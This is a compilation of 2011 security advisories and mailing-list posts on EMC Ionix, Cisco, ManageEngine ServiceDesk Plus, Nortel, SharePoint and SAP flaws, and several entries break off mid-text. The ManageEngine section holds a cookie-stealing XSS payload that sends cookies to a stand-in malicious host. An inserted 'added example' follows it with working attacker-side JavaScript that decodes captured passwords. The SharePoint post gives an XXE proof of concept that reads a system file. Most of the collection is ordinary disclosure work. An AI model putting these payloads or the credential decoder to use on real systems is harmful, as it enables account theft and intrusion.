ESA-2011-029: Buffer overflow vulnerability in multiple EMC Ionix products
EMC Identifier: ESA-2011-029
CVE Identifier: CVE-2011-2738
Severity Rating: CVSS v2 Base Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)

Affected products:
  Ionix Application Connectivity Monitor (Ionix ACM) 2.3 and earlier
  Ionix Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) 3.2.0.2 and earlier
  Ionix IP Management Suite (Ionix IP) 8.1.1.1 and earlier
  Ionix IPv6 Management Suite (Ionix IPv6) 2.0.2 and earlier
  Ionix MPLS Management Suite (Ionix MPLS) 4.0.0 and earlier
  Ionix Multicast Manager (Ionix MCAST) 2.1 and earlier
  Ionix Network Protocol Management Suite (Ionix NPM) 3.1 and earlier
  Ionix Optical Transport Management Suite (Ionix OTM) 5.1 and earlier
  Ionix Server Manager (EISM) 3.0 and earlier
  Ionix Service Assurance Management Suite (Ionix SAM) 8.1.0.6 and earlier
  Ionix Storage Insight for Availability Suite (Ionix SIA) 2.3.1 and earlier
  Ionix VoIP Availability Management Suite (Ionix VoIP AM) 4.0.0.3 and earlier

Vulnerability Summary:
The affected EMC Ionix products contain a buffer overflow vulnerability which can be exploited to cause a denial of service or, possibly, arbitrary code execution.

Vulnerability Details:
Multiple EMC Ionix products contain a buffer overflow vulnerability. The vulnerability may allow a remote unauthenticated user to send a specially-crafted message over TCP or UDP to cause a denial of service or, possibly, execute arbitrary code.

Resolution:
The following EMC Ionix products contain resolutions to this issue:
  EMC Ionix Adapter for Alcatel-Lucent 5620 SAM EMS (ASAM) 3.2.0.3 and later
  EMC Ionix IP Management Suite (IP) 8.1.2 and later
  EMC Ionix Service Assurance Management Suite (SAM) 8.1.1 and later
  EMC Ionix VoIP Availability Management Suite (VoIP AM) 4.0.0.4 and later

EMC strongly recommends all customers upgrade at the earliest opportunity. EMC will communicate the fixes for all other affected products as they become available. Regularly check EMC Knowledgebase solution emc274245 for the status of these fixes.

Link to remedies:
Registered EMC Powerlink customers can download software from Powerlink. For EMC Ionix Software, navigate in Powerlink to Home > Support > Software Downloads and Licensing > Downloads E-I. Because the view is restricted based on customer agreements, you may not have permission to view certain downloads. Should you not see a software download you believe you should have access to, follow the instructions in EMC Knowledgebase solution emc116045.

Credits:
EMC would like to thank Abdul Aziz Hariri working with TippingPoint's Zero Day Initiative (http://www.zerodayinitiative.com) for reporting this issue.

For an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends that all customers take into account both the base score and any relevant temporal and environmental scores, which may impact the potential severity associated with a particular security vulnerability.

EMC Corporation distributes EMC Security Advisories in order to bring to the attention of users of the affected EMC products important security information. EMC recommends all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall EMC or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

EMC Product Security Response Center
security_al...@emc.com
http://www.emc.com/contact-us/contact/product-security-response-center.htm
Cisco Security Advisory: CiscoWorks LAN Management Solution Remote Code Execution Vulnerabilities
Advisory ID: cisco-sa-20110914-lms
Revision 1.0
For Public Release 2011 September 14 1600 UTC (GMT)

Summary
=======

Two vulnerabilities exist in CiscoWorks LAN Management Solution software that could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers.

Cisco has released free software updates that address these vulnerabilities. There are no workarounds available to mitigate these vulnerabilities.

This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20110914-lms.shtml

Note: Cisco Unified Service Monitor and Cisco Unified Operations Manager are also affected by these vulnerabilities. A separate advisory for Cisco Unified Service Monitor and Cisco Unified Operations Manager is available at: http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml

Affected Products
=================

Vulnerable Products
+------------------

CiscoWorks LAN Management Solution software releases 3.1, 3.2, and 4.0 are affected by these vulnerabilities. CiscoWorks LAN Management Solution versions 3.1 and 3.2 are vulnerable only if the Device Fault Management (DFM) component is installed. CiscoWorks LAN Management Solution versions 4.0 and later are vulnerable regardless of the options selected during installation.

Note: Cisco Unified Service Monitor and Cisco Unified Operations Manager are also affected by these vulnerabilities.

Products Confirmed Not Vulnerable
+--------------------------------

No Cisco products other than Cisco Unified Service Monitor and Cisco Unified Operations Manager are currently known to be affected by these vulnerabilities.

Details
=======

CiscoWorks LAN Management Solution is an integrated suite of management functions that simplifies the configuration, administration, monitoring, and troubleshooting of a network.

Two vulnerabilities exist in CiscoWorks LAN Management Solution software that could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers.

Note: These vulnerabilities can be triggered by sending a series of crafted packets to the affected server over TCP port 9002.

Both vulnerabilities are documented in Cisco bug ID CSCtn64922 (registered customers only) and have been assigned CVE ID CVE-2011-2738.

Vulnerability Scoring Details
+----------------------------

Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding CVSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss

* CSCtn64922 - Cisco Unified Service Monitor Remote Code Execution

    CVSS Base Score - 10
      Access Vector          - Network
      Access Complexity      - Low
      Authentication         - None
      Confidentiality Impact - Complete
      Integrity Impact       - Complete
      Availability Impact    - Complete

    CVSS Temporal Score - 8.3
      Exploitability    - Functional
      Remediation Level - Official-Fix
      Report Confidence - Confirmed

Impact
======

Successful exploitation of these vulnerabilities could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers.

Software Versions and Fixes
===========================

When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.

These vulnerabilities have been corrected in Cisco Prime LAN Management Solution Software version 4.1. Cisco Prime LAN Management Solution Software can be downloaded from the following link: http://www.cisco.com/cisco/software/navigator.html?mdfid=283427841&i=rm

Workarounds
===========

There are no workarounds available to mitigate these vulnerabilities. Additional mitigations that
Cisco Security Advisory: Cisco Unified Service Monitor and Cisco Unified Operations Manager Remote Code Execution Vulnerabilities
Advisory ID: cisco-sa-20110914-cusm
Revision 1.0
For Public Release 2011 September 14 1600 UTC (GMT)

Summary
=======

Two vulnerabilities exist in Cisco Unified Service Monitor and Cisco Unified Operations Manager software that could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers.

Cisco has released free software updates that address these vulnerabilities. There are no workarounds available to mitigate these vulnerabilities.

This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml

Note: CiscoWorks LAN Management Solution is also affected by these vulnerabilities. A separate advisory for CiscoWorks LAN Management Solution is available at: http://www.cisco.com/warp/public/707/cisco-sa-20110914-lms.shtml

Affected Products
=================

Vulnerable Products
+------------------

All versions of Cisco Unified Service Monitor and Cisco Unified Operations Manager prior to 8.6 are affected.

To determine the Cisco Unified Service Monitor and Cisco Unified Operations Manager software version, navigate to Administration > Software Center (Common Services) > Software Update. The Software Update page displays the licensing and software version.

Products Confirmed Not Vulnerable
+--------------------------------

No Cisco products other than CiscoWorks LAN Management Solution are currently known to be affected by these vulnerabilities.

Details
=======

Cisco Unified Service Monitor and Cisco Unified Operations Manager are products from the Cisco Unified Communications Management Suite. They provide a way to continuously monitor active calls supported by the Cisco Unified Communications System.

Two vulnerabilities exist in Cisco Unified Service Monitor and Cisco Unified Operations Manager software that could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers.

These vulnerabilities can be triggered by sending a series of crafted packets to the affected server over TCP port 9002.

Both of these vulnerabilities are documented in Cisco bug ID CSCtn42961 (registered customers only) and have been assigned CVE ID CVE-2011-2738.

Vulnerability Scoring Details
+----------------------------

Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss

* CSCtn42961 - Cisco Unified Service Monitor Remote Code Execution

    CVSS Base Score - 10
      Access Vector          - Network
      Access Complexity      - Low
      Authentication         - None
      Confidentiality Impact - Complete
      Integrity Impact       - Complete
      Availability Impact    - Complete

    CVSS Temporal Score - 8.3
      Exploitability    - Functional
      Remediation Level - Official-Fix
      Report Confidence - Confirmed

Impact
======

Successful exploitation of these vulnerabilities could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers.

Software Versions and Fixes
===========================

When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.

These vulnerabilities have been corrected in Cisco Unified Service Monitor and Cisco Unified Operations Manager software version 8.6. Cisco Unified Service Monitor and Cisco Unified Operations Manager software can be downloaded from the following link: http://www.cisco.com/cisco/software/navigator.html?mdfid=280110371&i=rm

Workarounds
===========

There are no workarounds available to mitigate these vulnerabilities. Mitigations
Re: Vulnerabilities in trading and SCADA softwares
On Wed, Sep 14, 2011 at 5:13 AM, fergal.cass...@measuresoft.com wrote:

> Please take this constructively... The so-called vulnerability in ScadaPro does not apply when the Windows firewall is enabled, and under normal circumstances the TCP/IP port is not used to communicate with the ScadaPro service.

Measuresoft should not stake its security on the hopes that a firewall is running. There will be plenty of folks who will do dumb things with it.

> In the next release of ScadaPro the TCP/IP port will not be available and instead a secure web service will be available. Also please note these tests were performed independently of Measuresoft on a demo version and without seeking or obtaining any advice from Measuresoft on how to securely deploy ScadaPro.

Measuresoft should be deploying securely out of the box. Require the user to make manual changes to punch holes in the firewall (or do it for them after they answer a yes/no with no as the default). Secure out of the box is a good thing, even if it causes a few immediate hardships.

Jeff
CORE-2011-0506 - Multiples Vulnerabilities in ManageEngine ServiceDesk Plus
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Multiples Vulnerabilities in ManageEngine ServiceDesk Plus

1. *Advisory Information*

Title: Multiples Vulnerabilities in ManageEngine ServiceDesk Plus
Advisory ID: CORE-2011-0506
Advisory URL: http://www.coresecurity.com/content/multiples-vulnerabilities-manageengine-sdp
Date published: 2011-09-14
Date of last update: 2011-09-14
Vendors contacted: ManageEngine
Release mode: User release

2. *Vulnerability Information*

Class: Authentication issues [CWE-287], Cross site scripting [CWE-79]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1509, CVE-2011-1510

3. *Vulnerability Description*

ManageEngine ServiceDesk Plus is a complete web-based and ITIL-ready service desk software with integrated asset management, developed by ManageEngine, the Enterprise IT Management Software division of Zoho Corporation [1].

The authentication process of ServiceDesk Plus obfuscates user passwords using a trivial and symmetrical algorithm in Javascript code with no secret. Given that user passwords are stored locally in user cookies and that the Javascript code to encrypt and decrypt passwords ships in a .js file, the authentication process of ServiceDesk Plus can be bypassed, allowing an attacker to obtain usernames and passwords of registered users.

Additionally, a cross site scripting vulnerability related to search functions was found.

4. *Vulnerable packages*

  . ManageEngine ServiceDesk Plus 8.0.0 Professional edition.
  . Older versions are probably affected too, but they were not checked.

5. *Non-vulnerable packages*

  . Contact vendor for further information.

6. *Vendor Information, Solutions and Workarounds*

Regarding the vulnerability in the 'SearchSolution' page [CVE-2011-1510], the SDP team identified this vulnerability [2011-05-16] and it was fixed in SDP 8012, June 2011.

ManageEngine did not provide technical information, a workaround or a clear timeline for fixes regarding [CVE-2011-1509]. Please contact the vendor for further information and patches.

7. *Credits*

This vulnerability was discovered and researched by Matias Blanco from Core Security Technologies.

8. *Technical Description / Proof of Concept Code*

8.1. *Authentication Weakness* [CVE-2011-1509]

User passwords are pseudo-encrypted and stored locally in user cookies. This encryption is symmetrical, using a Caesar cipher (a fixed shift of 23 on each character code) with no salt or secret, and the Javascript code to encrypt and decrypt passwords lives in the 'Login.js' file.

/-----
/* $Id: Login.js,v 1.47 2010/10/05 15:47:53 vidhyadurai Exp $ */
...
function encryptPassword(textPassword)
{
    var num_out = "";
    var str_in = escape(textPassword);
    for(i = 0; i < str_in.length; i++)
    {
        num_out += str_in.charCodeAt(i) - 23;
    }
    return num_out;
}

function decryptPassword(encPassword)
{
    var str_out = "";
    var num_out = encPassword;
    for(i = 0; i < num_out.length; i += 2)
    {
        num_in = parseInt(num_out.substr(i,[2])) + 23;
        num_in = unescape('%' + num_in.toString(16));// No I18N
        str_out += num_in;
    }
    var textPassword = unescape(str_out);
    return textPassword ;
}
-----/

So, if the attacker succeeds in stealing the cookie, he can easily decrypt it and obtain the original password. Given that the username is also stored in plaintext in the cookie, this can lead to impersonation and identity theft.

8.2. *Cross-Site Scripting* [CVE-2011-1510]

There is a lack of sanitization in the 'searchText' parameter of the 'SolutionSearch.do' page. An external attacker can obtain the password of an authenticated ManageEngine user by making this request:

/-----
https://[vulnerable_site]/SolutionSearch.do?searchText=';var el=document.createElement('img');el.src='http://[malicious_site]?pass='%2Bdocument.cookie;document.documentElement.appendChild(el);'
-----/

This request makes the victim's browser perform an HTTP request to a webserver controlled by the attacker, 'http://[malicious_site]', sending the cookie that includes the trivially decodable password.

9. *Report Timeline*

  . 2011-05-12: Initial notification to the vendor. Publication date set to June 7th, 2011.
  . 2011-05-13: The Service Desk team asks Core for a technical description of the vulnerability.
  . 2011-05-13: Technical details sent to the Service Desk team.
  . 2011-05-16: The Service Desk team notifies that they are analyzing the [CVE-2011-1509] issue and it will take them some time to fix it. The issue [CVE-2011-1510] was identified and it will be fixed in SDP 8012, which is expected by the end of May 2011.
  . 2011-05-23: Core requests clarification on whether the fixes will be released together or in two release cycles.
  . 2011-05-27: The Service Desk team notifies that the issue [CVE-2011-1510] will be fixed in the upcoming hotfix 8012, which is
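An added example, not code from the Core advisory or from ManageEngine, tying sections 8.1 and 8.2 together: it re-implements the Login.js transform (the vendor's algorithm as quoted above, written with fromCharCode instead of per-character unescape, which is equivalent for the character range escape() produces), parses a document.cookie string of the kind the injected <img> request delivers to the attacker's listener, and recovers the plaintext credentials. The cookie names LoginName and PassWD, the session cookie value and the sample password are constructed for this example; the advisory does not name the cookie fields. It also shows that the fixed offset 23 can be recovered from a single known password/cookie pair, so an attacker does not even need a copy of Login.js.

```javascript
// Added example (not from the Core advisory or ManageEngine): what an attacker
// does with a ServiceDesk Plus cookie captured via the SolutionSearch.do XSS,
// and why the Login.js transform offers no protection.
//
// escape()/unescape() are the legacy globals the vendor's Login.js relies on;
// they still exist in Node.js and browsers, so the behaviour matches the original.

const SHIFT = 23; // the fixed offset hard-coded in Login.js

// Re-implementation of the Login.js transform: escape() the password, then emit
// (charCode - 23) for every character as decimal digits. Every character that
// escape() leaves or produces (A-Z a-z 0-9 @*_+-./ and '%') has a code between
// 37 and 122, so every chunk is exactly two digits and the decoder can step by 2.
function encodeLikeLoginJs(password, shift = SHIFT) {
  const s = escape(password);
  let out = '';
  for (let i = 0; i < s.length; i++) {
    out += String(s.charCodeAt(i) - shift);
  }
  return out;
}

// The inverse. No key is involved: anyone holding the cookie value can run this.
function decodeLikeLoginJs(encoded, shift = SHIFT) {
  let s = '';
  for (let i = 0; i < encoded.length; i += 2) {
    s += String.fromCharCode(parseInt(encoded.slice(i, i + 2), 10) + shift);
  }
  return unescape(s);
}

// Even without Login.js, the offset leaks from one known password/cookie pair
// (e.g. the attacker's own account): it is the difference on the first chunk.
function recoverShift(knownPassword, knownEncoded) {
  return escape(knownPassword).charCodeAt(0) - parseInt(knownEncoded.slice(0, 2), 10);
}

// Minimal parser for a document.cookie / Cookie-header string ("k=v; k2=v2").
function parseCookie(cookieString) {
  const jar = {};
  for (const part of cookieString.split(';')) {
    const idx = part.indexOf('=');
    if (idx < 0) continue;
    jar[part.slice(0, idx).trim()] = part.slice(idx + 1).trim();
  }
  return jar;
}

// Attacker side: given the exfiltrated document.cookie string, return the
// plaintext credentials. The cookie names are assumptions for this example; the
// advisory only states that username and obfuscated password are both client-side.
function credentialsFromCookie(cookieString, userField = 'LoginName', passField = 'PassWD') {
  const jar = parseCookie(cookieString);
  if (!(userField in jar) || !(passField in jar)) return null;
  return { user: jar[userField], pass: decodeLikeLoginJs(jar[passField]) };
}

// Constructed sample: the value the attacker's listener receives in the `pass=`
// query string of the injected <img> request (session id and password invented).
const capturedCookie = 'JSESSIONID=DEADBEEF; LoginName=admin; PassWD='
  + encodeLikeLoginJs('P@ss w0rd!');

console.log(credentialsFromCookie(capturedCookie));
```

The only real fix is the one the advisory implies: never put the password (obfuscated or not) in a cookie; hold a random server-side session identifier instead, and output-encode searchText so the cookie cannot be read by injected script in the first place.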
Nortel Contact Recording Centralized Archive 6.5.1 EyrAPIConfiguration getSubKeys() Remote SQL Injection Exploit
<?php
/*
Nortel Contact Recording Centralized Archive 6.5.1 EyrAPIConfiguration Web Service getSubKeys()
Remote SQL Injection Exploit

tested against:
  Microsoft Windows Server 2003 r2 sp2
  Microsoft SQL Server 2005 Express

download uri:
  ftp://ftp.avaya.com/incoming/Up1cku9/tsoweb/web1/software/c/contactcenter/crqm/6_5_CS1K_2/Nortel-DVD3-Archive-6_5.iso

background:

This software installs a Tomcat HTTP server which listens on port 8080 for incoming
connections. It exposes the following servlet, as declared inside
c:\Program Files\[chosen folder]\Tomcat5\webapps\EyrAPI\WEB-INF\web.xml:

..
<servlet-mapping>
    <servlet-name>EyrAPIConfiguration</servlet-name>
    <url-pattern>/EyrAPIConfiguration/*</url-pattern>
</servlet-mapping>
..

at the following url:

http://[host]:8080/EyrAPI/EyrAPIConfiguration/EyrAPIConfigurationIf

Vulnerability:

Without prior authentication, you can reach a web service with various methods available,
as described inside the associated WSDL, see file:
c:\Program Files\[chosen folder]\Tomcat5\webapps\EyrAPI\WEB-INF\classes\EyrAPIConfiguration.wsdl

Among them is the getSubKeys() method. Now look at getSubKeys() inside the decompiled
c:\Program Files\[chosen folder]\Tomcat5\webapps\EyrAPI\WEB-INF\classes\com\eyretel\eyrapi\EyrAPIConfigurationImpl.class:

..
public String getSubKeys(boolean iterateSubKeys, boolean includeValues, String systemId,
                         String componentId, String sysCompId, String userName)
    throws RemoteException
{
    StringBuffer xml;
    ConfigOwnerId configOwnerId;
    Connection conn;
    PreparedStatement pStmt;
    ResultSet rs;
    PreparedStatement pStmt2;
    ResultSet rs2;
    log.info((new StringBuilder()).append("Request getSubKeys: iterateSubKeys=").append(iterateSubKeys)
        .append(", includeValues=").append(includeValues).append(", SystemId=").append(systemId)
        .append(", componentId=").append(componentId).append(", sysCompId=").append(sysCompId)
        .append(", userName=").append(userName).toString());
    xml = new StringBuffer("<ConfigurationNodeList>");
    configOwnerId = null;
    conn = null;
    pStmt = null;
    rs = null;
    pStmt2 = null;
    rs2 = null;
    try
    {
        conn = SiteDatabase.getInstance().getConnection();
        if(EyrAPIProperties.getInstance().getProperty("database", "MSSQLServer").equalsIgnoreCase("Oracle"))
        {
            if(componentId.compareToIgnoreCase("") == 0)
                componentId = "*";
            if(systemId.compareToIgnoreCase("") == 0)
                systemId = "*";
            if(sysCompId.compareToIgnoreCase("") == 0)
                sysCompId = "*";
            if(userName.compareToIgnoreCase("") == 0)
                userName = "*";
            // user-controlled SOAP parameters are concatenated straight into the query text
            pStmt = conn.prepareStatement((new StringBuilder())
                .append("SELECT ConfigOwnerID FROM ConfigOwnerView WHERE nvl(ComponentID, '*') = '").append(componentId)
                .append("' AND ").append("nvl(SystemID, '*') = '").append(systemId)
                .append("' AND ").append("nvl(SysCompID, '*') = '").append(sysCompId)
                .append("' AND ").append("nvl(UserName, '*') = '").append(userName)
                .append("'").toString());
            rs = pStmt.executeQuery();
        } else
        {
            pStmt = conn.prepareStatement((new StringBuilder())
                .append("SELECT ConfigOwnerID FROM ConfigOwnerView WHERE ISNULL(CONVERT(varchar(36), ComponentID), '') = '").append(unpunctuate(componentId))
                .append("' AND ").append("ISNULL(CONVERT(varchar(36), SystemID), '') = '").append(unpunctuate(systemId))
                .append("' AND ").append("ISNULL(CONVERT(varchar(36), SysCompID), '') = '").append(unpunctuate(sysCompId))
                .append("' AND ").append("ISNULL(UserName, '') = '").append(unpunctuate(userName))
                .append("'").toString());
            rs = pStmt.executeQuery();
        }
        if(rs.next())
        {
            String strConfigOwnerId = rs.getString(1);
            if(!rs.wasNull())
                configOwnerId = new ConfigOwnerId(strConfigOwnerId);
            pStmt2 = conn.prepareStatement((new StringBuilder())
                .append("SELECT ConfigGroupID, ConfigGroupName FROM ConfigGroupView WHERE ConfigOwnerID = '")
                .append(configOwnerId.toString()).append("'").toString());
            for(rs2 = pStmt2.executeQuery(); rs2.next(); xml.append(getSubKeyValuesInc(new Integer(rs2.getInt(1)), iterateSubKeys, includeValues)));
        }
    }
    catch(SQLException e)
    {
        String msg = "Unable to get subkeys";
        log.error(msg, e);
        throw new RemoteException(msg, e);
    }
    catch(GenericDatabaseException e)
    {
        String msg = "Unable to get subkeys";
        log.error(msg, e);
        throw new RemoteException(msg, e);
    }
    DbHelper.closeStatement(log, pStmt);
    DbHelper.closeResultSet(log, rs);
    DbHelper.closeStatement(log, pStmt2);
    DbHelper.closeResultSet(log, rs2);
XEE vulnerabilities in SharePoint (MS11-074) and DotNetNuke
Hello,

Microsoft recently published MS11-074. This bulletin mainly concerns SharePoint (2007 and 2010), but CVE-2011-1892 also applies to Office Groove (client and server), Office Forms Server 2007 and Office Web Apps 2010.

The vulnerability is an XML External Entity reference, as described in CWE-611 [1]. The vulnerable component is the XML Web Part, and the following image demonstrates the exploit on a SharePoint 2007 server [2].

DotNetNuke quietly patched a very similar vulnerability in its XML component this summer (v6.0.0 is OK [3]).

As described in Microsoft documentation [4], setting XmlReaderSettings::XmlResolver to NULL is enough to correct this bug.

Simple PoC for SharePoint and DotNetNuke:

-- XML --
<!DOCTYPE doc [ <!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts"> ]>
<doc>&boom;</doc>

-- XSL --
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:apply-templates/>
    <xsl:value-of select="doc"/>
  </xsl:template>
</xsl:stylesheet>

More details, in French, on my blog: http://goo.gl/hptbj

1: http://cwe.mitre.org/data/definitions/611.html
2: http://www.agarri.fr/docs/shpt-xee.png
3: http://dnnxml.codeplex.com/releases/view/62862
4: http://msdn.microsoft.com/en-us/library/ms172415.aspx

Regards,
Nicolas Grégoire / Agarri
[Onapsis Security Advisory 2011-015] SAP WebAS webrfc Cross-Site Scripting
This advisory can be downloaded in PDF format from http://www.onapsis.com/. By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well as exclusive access to special promotions for upcoming trainings and conferences.

1. Impact on Business
=====================

By exploiting this vulnerability, an internal or external attacker would be able to perform attacks on the Organization's users through weaknesses in the SAP system. Upon a successful exploitation, he would be able to obtain sensitive information from legitimate users through social engineering attacks and/or exploit vulnerabilities in their systems in order to take control of them.

Risk Level: Medium

2. Advisory Information
=======================

- Release Date: 2011-09-14
- Last Revised: 2011-09-14
- Security Advisory ID: ONAPSIS-2011-015
- Onapsis SVS ID: ONAPSIS-00040
- Researcher: Mariano Nuñez Di Croce

3. Vulnerability Information
============================

- Vendor: SAP
- Affected Components:
  * SAP Web Application Server 7.00 Patch Number 95 (check SAP Note 1536640 for detailed information on affected releases)
- Vulnerability Class: Cross-Site Scripting (XSS)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: Yes
- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-015

4. Affected Components Description
==================================

The SAP Web Application Server provides access to many services through a Web engine, the SAP Internet Communication Framework (ICF).

5. Vulnerability Details
========================

It has been detected that the WEBRFC ICF service suffers from an input validation vulnerability, which can be exploited to perform XSS attacks.

Further technical details about this issue are not disclosed at this moment, with the purpose of providing enough time for affected customers to patch their systems and protect against the exploitation of the described vulnerability.

6. Solution
===========

SAP has released SAP Note 1536640, which provides patched versions of the affected components. The patches can be downloaded from https://service.sap.com/sap/support/notes/1536640

Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks.

7. Report Timeline
==================

* 2011-01-25: Onapsis provides vulnerability information to SAP.
* 2011-01-25: SAP confirms reception of vulnerability submission.
* 2011-05-10: SAP releases SAP Note 1536640 fixing the vulnerability.
* 2011-09-14: Onapsis releases security advisory.

About Onapsis Research Labs
===========================

Onapsis is continuously investing resources in the research of the security of business-critical systems and applications. With that objective in mind, a special unit, the Onapsis Research Labs, has been developed since the creation of the company. The experts involved in this special team lead the public research trends in this matter, having discovered and published many of the public security vulnerabilities in these platforms.

The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest risks to their critical business information. Furthermore, the results of these research projects are usually shared with the general security and professional community, encouraging the sharing of information and increasing the common knowledge in this field.

About Onapsis
=============

Onapsis is the leading provider of solutions for the security of ERP systems and business-critical applications. Through different innovative products and services, Onapsis helps its global customers to effectively increase the security level of their core business platforms, protecting their information and decreasing financial fraud risks.

Onapsis is built upon a team of world-renowned experts in the SAP security field, with several years of experience in the assessment and protection of critical platforms in world-wide customers, such as Fortune-100 companies and governmental entities.

Our star product, Onapsis X1, enables our customers to perform automated Security Compliance Audits, Vulnerability Assessments and Penetration Tests over their SAP platform, helping them enforce compliance requirements, decrease financial fraud risks and reduce audit costs drastically.

Some of our featured services include SAP Penetration Testing, SAP Gateway
[Onapsis Security Advisory 2011-016] SAP WebAS Malicious SAP Shortcut Generation
This advisory can be downloaded in PDF format from http://www.onapsis.com/. By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well as exclusive access to special promotions for upcoming trainings and conferences.

1. Impact on Business
=====================

By exploiting this vulnerability, an internal or external attacker would be able to perform attacks on the Organization's users through weaknesses in the SAP system. Upon a successful exploitation, he would be able to obtain sensitive information from legitimate users through social engineering attacks and/or exploit vulnerabilities in their systems in order to take control of them.

Risk Level: Medium

2. Advisory Information
=======================

- Release Date: 2011-09-14
- Last Revised: 2011-09-14
- Security Advisory ID: ONAPSIS-2011-016
- Onapsis SVS ID: ONAPSIS-00041
- Researcher: Mariano Nuñez Di Croce

3. Vulnerability Information
============================

- Vendor: SAP
- Affected Components:
  * SAP Web Application Server 7.00 Patch Number 95 (check SAP Note 1556749 for detailed information on affected releases)
- Vulnerability Class: Abuse of designed functionality / Parameter Injection
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: No
- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-016

4. Affected Components Description
==================================

The SAP Web Application Server provides access to many services through a Web engine, the SAP Internet Communication Framework (ICF).

5. Vulnerability Details
========================

The SHORTCUT ICF service represents a dangerous functionality per se, as it can be executed anonymously by malicious parties to perform client-side attacks on the organization's end-users. Furthermore, this service contains a parameter injection vulnerability, which provides attackers with further control over the generation of the SAP shortcuts.

Further technical details about this issue are not disclosed at this moment, with the purpose of providing enough time for affected customers to patch their systems and protect against the exploitation of the described vulnerability.

7. Report Timeline
==================

* 2011-01-25: Onapsis provides vulnerability information to SAP.
* 2011-01-25: SAP confirms reception of vulnerability submission.
* 2011-04-12: SAP releases SAP Note 1556749 fixing the vulnerability.
* 2011-09-14: Onapsis releases security advisory.